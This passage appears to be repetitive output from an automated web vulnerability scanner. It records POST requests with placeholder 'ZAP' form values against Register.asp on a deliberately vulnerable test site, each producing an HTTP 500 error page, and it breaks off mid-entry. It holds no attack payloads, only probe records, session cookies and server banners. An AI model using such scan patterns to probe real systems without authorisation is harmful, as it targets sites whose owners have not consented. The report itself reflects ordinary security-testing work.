Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
